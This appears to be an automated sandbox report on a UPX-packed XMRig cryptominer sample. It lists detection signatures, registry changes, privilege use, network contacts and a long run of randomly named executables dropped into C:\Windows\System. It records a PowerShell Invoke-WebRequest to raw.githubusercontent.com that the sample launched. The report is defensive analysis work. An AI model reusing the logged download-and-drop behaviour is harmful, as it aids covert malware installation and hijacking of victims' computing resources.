Malware Analysis Report

2024-09-10 00:19

Sample ID 240613-kjjv7a1eqh
Target 6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe
SHA256 1bfbdabf21cbb13b96eb5c8edac83f7ec1d6e8dba09ab2c53795315664b73729
Tags xmrig execution miner upx
Score 10/10

Analysis Overview

Threat Level: Known bad

The file 6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe was found to be: Known bad.

Malicious Activity Summary

xmrig execution miner upx

XMRig Miner payload

xmrig

Xmrig family

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Loads dropped DLL

Executes dropped EXE

UPX packed file

Legitimate hosting services abused for malware hosting/C2

Drops file in Windows directory

Unsigned PE

Enumerates system info in registry

Checks SCSI registry key(s)

Modifies data under HKEY_USERS

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-06-13 08:37

Signatures

XMRig Miner payload

miner

Xmrig family

xmrig

UPX packed file

upx

Unsigned PE

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-13 08:37

Reported

2024-06-13 08:40

Platform

win10v2004-20240611-en

Max time kernel

109s

Max time network

128s

Command Line

"C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

UPX packed file

upx

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A

Drops file in Windows directory

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags C:\Windows\system32\dwm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID C:\Windows\system32\dwm.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\system32\dwm.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\system32\dwm.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\dwm.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\system32\dwm.exe N/A
Token: 33 N/A C:\Windows\system32\dwm.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\dwm.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\dwm.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\dwm.exe N/A

Suspicious use of WriteProcessMemory

Processes

C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "

C:\Windows\system32\dwm.exe

"dwm.exe"

Network

Country Destination Domain Proto
DE 3.120.98.217:8080 tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 github.githubassets.com udp
US 185.199.108.154:443 github.githubassets.com tcp
US 185.199.108.154:443 github.githubassets.com tcp
US 8.8.8.8:53 154.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 193.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 185.199.108.154:443 github.githubassets.com tcp
US 185.199.108.154:443 github.githubassets.com tcp
US 185.199.108.154:443 github.githubassets.com tcp
US 185.199.108.154:443 github.githubassets.com tcp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 243.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp

Files

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-13 08:37

Reported

2024-06-13 08:40

Platform

win7-20240611-en

Max time kernel

150s

Max time network

144s

Command Line

"C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\System\OVnaYCr.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\yLYEYuR.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\hVvxWgW.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\NptRdUb.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ZxnfKff.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\vItjaGI.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\AqfuqVB.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\xqpIkVW.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\VARkopk.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\cpKYhIx.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\yXFvblT.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\oFzTvYv.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\qRswTPH.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\pfINHAu.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\jFiIPzA.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\kjMbSpS.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\twyLZxV.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\mPPBtUV.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\NtGIHSP.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\SwJkHXt.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\sXxEwza.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target

Processes

C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "


C:\Windows\System\PpJozaX.exe

C:\Windows\System\xQEHIpM.exe

C:\Windows\System\xQEHIpM.exe

C:\Windows\System\KcWwQYO.exe

C:\Windows\System\KcWwQYO.exe

C:\Windows\System\BtivDWl.exe

C:\Windows\System\BtivDWl.exe

C:\Windows\System\mjIdzTI.exe

C:\Windows\System\mjIdzTI.exe

C:\Windows\System\qLLlyNm.exe

C:\Windows\System\qLLlyNm.exe

C:\Windows\System\Gdvlbhc.exe

C:\Windows\System\Gdvlbhc.exe

C:\Windows\System\srgmTIt.exe

C:\Windows\System\srgmTIt.exe

C:\Windows\System\VIZEZoW.exe

C:\Windows\System\VIZEZoW.exe

C:\Windows\System\VPyNxVN.exe

C:\Windows\System\VPyNxVN.exe

C:\Windows\System\urzZWpP.exe

C:\Windows\System\urzZWpP.exe

C:\Windows\System\qPFIeAk.exe

C:\Windows\System\qPFIeAk.exe

C:\Windows\System\OOheslD.exe

C:\Windows\System\OOheslD.exe

C:\Windows\System\vOyniJm.exe

C:\Windows\System\vOyniJm.exe

C:\Windows\System\VqtqGQn.exe

C:\Windows\System\VqtqGQn.exe

C:\Windows\System\sCPIVXj.exe

C:\Windows\System\sCPIVXj.exe

C:\Windows\System\exTPHtu.exe

C:\Windows\System\exTPHtu.exe

C:\Windows\System\RPqzwVj.exe

C:\Windows\System\RPqzwVj.exe

C:\Windows\System\dZAlgiv.exe

C:\Windows\System\dZAlgiv.exe

C:\Windows\System\rKmFLUM.exe

C:\Windows\System\rKmFLUM.exe

C:\Windows\System\tPwUXiT.exe

C:\Windows\System\tPwUXiT.exe

C:\Windows\System\jklHSfT.exe

C:\Windows\System\jklHSfT.exe

C:\Windows\System\AArGPnM.exe

C:\Windows\System\AArGPnM.exe

C:\Windows\System\VMxdrqx.exe

C:\Windows\System\VMxdrqx.exe

C:\Windows\System\bLBxrTX.exe

C:\Windows\System\bLBxrTX.exe

C:\Windows\System\KaZUVBu.exe

C:\Windows\System\KaZUVBu.exe

C:\Windows\System\UxHNiIq.exe

C:\Windows\System\UxHNiIq.exe

C:\Windows\System\vlDBxCn.exe

C:\Windows\System\vlDBxCn.exe

C:\Windows\System\tuOIhMT.exe

C:\Windows\System\tuOIhMT.exe

C:\Windows\System\oBRmiYg.exe

C:\Windows\System\oBRmiYg.exe

C:\Windows\System\dScWzQf.exe

C:\Windows\System\dScWzQf.exe

C:\Windows\System\YHtOcmV.exe

C:\Windows\System\YHtOcmV.exe

C:\Windows\System\yrljHTb.exe

C:\Windows\System\yrljHTb.exe

C:\Windows\System\VPjNkRA.exe

C:\Windows\System\VPjNkRA.exe

C:\Windows\System\ksdQvcw.exe

C:\Windows\System\ksdQvcw.exe

C:\Windows\System\rrrkPPe.exe

C:\Windows\System\rrrkPPe.exe

C:\Windows\System\FLEygUD.exe

C:\Windows\System\FLEygUD.exe

C:\Windows\System\FwLNYep.exe

C:\Windows\System\FwLNYep.exe

C:\Windows\System\BBTqVcM.exe

C:\Windows\System\BBTqVcM.exe

C:\Windows\System\fDUkZyo.exe

C:\Windows\System\fDUkZyo.exe

C:\Windows\System\BaBKObU.exe

C:\Windows\System\BaBKObU.exe

C:\Windows\System\ZkdlbNL.exe

C:\Windows\System\ZkdlbNL.exe

C:\Windows\System\bnbETxq.exe

C:\Windows\System\bnbETxq.exe

C:\Windows\System\jmmLBfH.exe

C:\Windows\System\jmmLBfH.exe

C:\Windows\System\xYzwvIo.exe

C:\Windows\System\xYzwvIo.exe

C:\Windows\System\CrfGycd.exe

C:\Windows\System\CrfGycd.exe

C:\Windows\System\XVciEkX.exe

C:\Windows\System\XVciEkX.exe

C:\Windows\System\YFtaokY.exe

C:\Windows\System\YFtaokY.exe

C:\Windows\System\pBENwQC.exe

C:\Windows\System\pBENwQC.exe

C:\Windows\System\FDjbBNI.exe

C:\Windows\System\FDjbBNI.exe

C:\Windows\System\gcjoZas.exe

C:\Windows\System\gcjoZas.exe

C:\Windows\System\HjjKGVD.exe

C:\Windows\System\HjjKGVD.exe

C:\Windows\System\rdTokWx.exe

C:\Windows\System\rdTokWx.exe

C:\Windows\System\FDAqEvs.exe

C:\Windows\System\FDAqEvs.exe

C:\Windows\System\RHvPBFO.exe

C:\Windows\System\RHvPBFO.exe

C:\Windows\System\FbNEjSU.exe

C:\Windows\System\FbNEjSU.exe

C:\Windows\System\vyTFtXq.exe

C:\Windows\System\vyTFtXq.exe

C:\Windows\System\WNJHDIg.exe

C:\Windows\System\WNJHDIg.exe

C:\Windows\System\lsUkssl.exe

C:\Windows\System\lsUkssl.exe

C:\Windows\System\ofDgKpv.exe

C:\Windows\System\ofDgKpv.exe

C:\Windows\System\BSdRvrh.exe

C:\Windows\System\BSdRvrh.exe

C:\Windows\System\ARyGItv.exe

C:\Windows\System\ARyGItv.exe

C:\Windows\System\rXApCDv.exe

C:\Windows\System\rXApCDv.exe

C:\Windows\System\VUgwtEP.exe

C:\Windows\System\VUgwtEP.exe

C:\Windows\System\puRSdpt.exe

C:\Windows\System\puRSdpt.exe

C:\Windows\System\kyMCltl.exe

C:\Windows\System\kyMCltl.exe

C:\Windows\System\essYBdw.exe

C:\Windows\System\essYBdw.exe

C:\Windows\System\ucIyKLh.exe

C:\Windows\System\ucIyKLh.exe

C:\Windows\System\rJCtXAd.exe

C:\Windows\System\rJCtXAd.exe

C:\Windows\System\KVIuCJA.exe

C:\Windows\System\KVIuCJA.exe

C:\Windows\System\PCNLFAM.exe

C:\Windows\System\PCNLFAM.exe

C:\Windows\System\gBRyAec.exe

C:\Windows\System\gBRyAec.exe

C:\Windows\System\lmeGKIt.exe

C:\Windows\System\lmeGKIt.exe

C:\Windows\System\wBefgVq.exe

C:\Windows\System\wBefgVq.exe

C:\Windows\System\zVfNFFD.exe

C:\Windows\System\zVfNFFD.exe

C:\Windows\System\FvWIBea.exe

C:\Windows\System\FvWIBea.exe

C:\Windows\System\rxxEtfd.exe

C:\Windows\System\rxxEtfd.exe

C:\Windows\System\pZgAZqa.exe

C:\Windows\System\pZgAZqa.exe

C:\Windows\System\YvlAnQz.exe

C:\Windows\System\YvlAnQz.exe

C:\Windows\System\ALrFwMn.exe

C:\Windows\System\ALrFwMn.exe

C:\Windows\System\KEIqJXn.exe

C:\Windows\System\KEIqJXn.exe

C:\Windows\System\xMYUJsJ.exe

C:\Windows\System\xMYUJsJ.exe

C:\Windows\System\wNhwKfu.exe

C:\Windows\System\wNhwKfu.exe

C:\Windows\System\FZSvSOk.exe

C:\Windows\System\FZSvSOk.exe

C:\Windows\System\aNTDNgP.exe

C:\Windows\System\aNTDNgP.exe

C:\Windows\System\XyPPQjr.exe

C:\Windows\System\XyPPQjr.exe

C:\Windows\System\rIrmVCs.exe

C:\Windows\System\rIrmVCs.exe

C:\Windows\System\weCPyXq.exe

C:\Windows\System\weCPyXq.exe

C:\Windows\System\pxwSEUC.exe

C:\Windows\System\pxwSEUC.exe

C:\Windows\System\FeyMSAR.exe

C:\Windows\System\FeyMSAR.exe

C:\Windows\System\nRKepyX.exe

C:\Windows\System\nRKepyX.exe

C:\Windows\System\tOPIBVe.exe

C:\Windows\System\tOPIBVe.exe

C:\Windows\System\jFDqCQk.exe

C:\Windows\System\jFDqCQk.exe

C:\Windows\System\ywqwCpz.exe

C:\Windows\System\ywqwCpz.exe

C:\Windows\System\dSkherm.exe

C:\Windows\System\dSkherm.exe

C:\Windows\System\gRAaJog.exe

C:\Windows\System\gRAaJog.exe

C:\Windows\System\wPUSpui.exe

C:\Windows\System\wPUSpui.exe

C:\Windows\System\RtEunyw.exe

C:\Windows\System\RtEunyw.exe

C:\Windows\System\oULzmXE.exe

C:\Windows\System\oULzmXE.exe

C:\Windows\System\NbrKIqg.exe

C:\Windows\System\NbrKIqg.exe

C:\Windows\System\haAuPDI.exe

C:\Windows\System\haAuPDI.exe

C:\Windows\System\vAXbXJa.exe

C:\Windows\System\vAXbXJa.exe

C:\Windows\System\cHHTqFO.exe

C:\Windows\System\cHHTqFO.exe

C:\Windows\System\bdpqwhV.exe

C:\Windows\System\bdpqwhV.exe

C:\Windows\System\xhjIRhN.exe

C:\Windows\System\xhjIRhN.exe

C:\Windows\System\HRZYBhs.exe

C:\Windows\System\HRZYBhs.exe

C:\Windows\System\ivisJES.exe

C:\Windows\System\ivisJES.exe

C:\Windows\System\xwzXYhR.exe

C:\Windows\System\xwzXYhR.exe

C:\Windows\System\CqsQmjA.exe

C:\Windows\System\CqsQmjA.exe

C:\Windows\System\NjGFGGn.exe

C:\Windows\System\NjGFGGn.exe

C:\Windows\System\hlHqdrn.exe

C:\Windows\System\hlHqdrn.exe

C:\Windows\System\nBzWCwE.exe

C:\Windows\System\nBzWCwE.exe

C:\Windows\System\vzpOZOw.exe

C:\Windows\System\vzpOZOw.exe

C:\Windows\System\CMinonE.exe

C:\Windows\System\CMinonE.exe

C:\Windows\System\PLFBQUF.exe

C:\Windows\System\PLFBQUF.exe

C:\Windows\System\bnZrbsy.exe

C:\Windows\System\bnZrbsy.exe

C:\Windows\System\vZovaqc.exe

C:\Windows\System\vZovaqc.exe

C:\Windows\System\jfZXOOk.exe

C:\Windows\System\jfZXOOk.exe

C:\Windows\System\CnUHZWJ.exe

C:\Windows\System\CnUHZWJ.exe

C:\Windows\System\UQagAYf.exe

C:\Windows\System\UQagAYf.exe

C:\Windows\System\xIXuHho.exe

C:\Windows\System\xIXuHho.exe

C:\Windows\System\AEOhEix.exe

C:\Windows\System\AEOhEix.exe

C:\Windows\System\imdhqtt.exe

C:\Windows\System\imdhqtt.exe

C:\Windows\System\eybEmsP.exe

C:\Windows\System\eybEmsP.exe

C:\Windows\System\HuvpRXo.exe

C:\Windows\System\HuvpRXo.exe

C:\Windows\System\CsgjJXb.exe

C:\Windows\System\CsgjJXb.exe

C:\Windows\System\xaEyFNz.exe

C:\Windows\System\xaEyFNz.exe

C:\Windows\System\HzOUGRG.exe

C:\Windows\System\HzOUGRG.exe

C:\Windows\System\mhgPvgZ.exe

C:\Windows\System\mhgPvgZ.exe

C:\Windows\System\BdPfmhL.exe

C:\Windows\System\BdPfmhL.exe

C:\Windows\System\ClDCpJV.exe

C:\Windows\System\ClDCpJV.exe

C:\Windows\System\FdCoaJi.exe

C:\Windows\System\FdCoaJi.exe

C:\Windows\System\VCpFxCd.exe

C:\Windows\System\VCpFxCd.exe

C:\Windows\System\ejLYseo.exe

C:\Windows\System\ejLYseo.exe

C:\Windows\System\zgbzXOp.exe

C:\Windows\System\zgbzXOp.exe

C:\Windows\System\wzDOAtO.exe

C:\Windows\System\wzDOAtO.exe

C:\Windows\System\vaOHaIZ.exe

C:\Windows\System\vaOHaIZ.exe

C:\Windows\System\FQeMKYD.exe

C:\Windows\System\FQeMKYD.exe

C:\Windows\System\ErdZXaW.exe

C:\Windows\System\ErdZXaW.exe

C:\Windows\System\TlOSocx.exe

C:\Windows\System\TlOSocx.exe

C:\Windows\System\QHOPNjy.exe

C:\Windows\System\QHOPNjy.exe

C:\Windows\System\UQoZOBa.exe

C:\Windows\System\UQoZOBa.exe

C:\Windows\System\NiTJHbE.exe

C:\Windows\System\NiTJHbE.exe

C:\Windows\System\EVTuuHn.exe

C:\Windows\System\EVTuuHn.exe

C:\Windows\System\rmDcORC.exe

C:\Windows\System\rmDcORC.exe

C:\Windows\System\wLZIGwb.exe

C:\Windows\System\wLZIGwb.exe

C:\Windows\System\kYPoPmV.exe

C:\Windows\System\kYPoPmV.exe

C:\Windows\System\qlOfZXp.exe

C:\Windows\System\qlOfZXp.exe

C:\Windows\System\cKKrquW.exe

C:\Windows\System\cKKrquW.exe

C:\Windows\System\LMidcNe.exe

C:\Windows\System\LMidcNe.exe

C:\Windows\System\NtzdsoZ.exe

C:\Windows\System\NtzdsoZ.exe

C:\Windows\System\YzDJAGq.exe

C:\Windows\System\YzDJAGq.exe

C:\Windows\System\ckKlMnS.exe

C:\Windows\System\ckKlMnS.exe

C:\Windows\System\jHqKsXe.exe

C:\Windows\System\jHqKsXe.exe

C:\Windows\System\CZCQfCT.exe

C:\Windows\System\CZCQfCT.exe

C:\Windows\System\JjGhRom.exe

C:\Windows\System\JjGhRom.exe

C:\Windows\System\FYRZVwZ.exe

C:\Windows\System\FYRZVwZ.exe

C:\Windows\System\nqEbNrk.exe

C:\Windows\System\nqEbNrk.exe

C:\Windows\System\WnEUqim.exe

C:\Windows\System\WnEUqim.exe

C:\Windows\System\cKxmpzz.exe

C:\Windows\System\cKxmpzz.exe

C:\Windows\System\UVnAXAO.exe

C:\Windows\System\UVnAXAO.exe

C:\Windows\System\zhdHewo.exe

C:\Windows\System\zhdHewo.exe

C:\Windows\System\NBTfOPW.exe

C:\Windows\System\NBTfOPW.exe

C:\Windows\System\eZaPepM.exe

C:\Windows\System\eZaPepM.exe

C:\Windows\System\gaqaVdv.exe

C:\Windows\System\gaqaVdv.exe

C:\Windows\System\GjdKoxC.exe

C:\Windows\System\GjdKoxC.exe

C:\Windows\System\JRCvyZh.exe

C:\Windows\System\JRCvyZh.exe

C:\Windows\System\kzkQVJp.exe

C:\Windows\System\kzkQVJp.exe

C:\Windows\System\UmhsvLb.exe

C:\Windows\System\UmhsvLb.exe

C:\Windows\System\UqsmbMq.exe

C:\Windows\System\UqsmbMq.exe

C:\Windows\System\yLPlKIk.exe

C:\Windows\System\yLPlKIk.exe

C:\Windows\System\ugTyXXN.exe

C:\Windows\System\ugTyXXN.exe

C:\Windows\System\PolpGfD.exe

C:\Windows\System\PolpGfD.exe

C:\Windows\System\zKicFRo.exe

C:\Windows\System\zKicFRo.exe

C:\Windows\System\RmywmLR.exe

C:\Windows\System\RmywmLR.exe

C:\Windows\System\psOIThk.exe

C:\Windows\System\psOIThk.exe

C:\Windows\System\UngVXjj.exe

C:\Windows\System\UngVXjj.exe

C:\Windows\System\qslvbAB.exe

C:\Windows\System\qslvbAB.exe

C:\Windows\System\GWjryzS.exe

C:\Windows\System\GWjryzS.exe

C:\Windows\System\UAqvEva.exe

C:\Windows\System\UAqvEva.exe

C:\Windows\System\SQBPiIX.exe

C:\Windows\System\SQBPiIX.exe

C:\Windows\System\KHqdlDy.exe

C:\Windows\System\KHqdlDy.exe

C:\Windows\System\UFBdKNw.exe

C:\Windows\System\UFBdKNw.exe

C:\Windows\System\jlshOcc.exe

C:\Windows\System\jlshOcc.exe

C:\Windows\System\ugzlenC.exe

C:\Windows\System\ugzlenC.exe

C:\Windows\System\VkdEhty.exe

C:\Windows\System\VkdEhty.exe

C:\Windows\System\bMMPPMB.exe

C:\Windows\System\bMMPPMB.exe

C:\Windows\System\JaBbOGU.exe

C:\Windows\System\JaBbOGU.exe

C:\Windows\System\JVGStcL.exe

C:\Windows\System\JVGStcL.exe

C:\Windows\System\PtTxZeu.exe

C:\Windows\System\PtTxZeu.exe

C:\Windows\System\aqMaVEo.exe

C:\Windows\System\aqMaVEo.exe

C:\Windows\System\mWZIYnU.exe

C:\Windows\System\mWZIYnU.exe

C:\Windows\System\JGiuGuZ.exe

C:\Windows\System\JGiuGuZ.exe

C:\Windows\System\UShPLov.exe

C:\Windows\System\UShPLov.exe

C:\Windows\System\PUbgWqG.exe

C:\Windows\System\PUbgWqG.exe

C:\Windows\System\rwiMptR.exe

C:\Windows\System\rwiMptR.exe

C:\Windows\System\mwJKaLY.exe

C:\Windows\System\mwJKaLY.exe

C:\Windows\System\alLDvtD.exe

C:\Windows\System\alLDvtD.exe

C:\Windows\System\RjsOOET.exe

C:\Windows\System\RjsOOET.exe

C:\Windows\System\BRGLGPc.exe

C:\Windows\System\BRGLGPc.exe

C:\Windows\System\vkpTTQF.exe

C:\Windows\System\vkpTTQF.exe

C:\Windows\System\gpsnUoW.exe

C:\Windows\System\gpsnUoW.exe

C:\Windows\System\CxMfWph.exe

C:\Windows\System\CxMfWph.exe

C:\Windows\System\fAZiftJ.exe

C:\Windows\System\fAZiftJ.exe

C:\Windows\System\yRszecm.exe

C:\Windows\System\yRszecm.exe

C:\Windows\System\yDcTCal.exe

C:\Windows\System\yDcTCal.exe

C:\Windows\System\EKdpYSq.exe

C:\Windows\System\EKdpYSq.exe

C:\Windows\System\ZOhcVzu.exe

C:\Windows\System\ZOhcVzu.exe

C:\Windows\System\qwWZXap.exe

C:\Windows\System\qwWZXap.exe

C:\Windows\System\MPdDIXe.exe

C:\Windows\System\MPdDIXe.exe

C:\Windows\System\LXisSTD.exe

C:\Windows\System\LXisSTD.exe

C:\Windows\System\dvoOgYM.exe

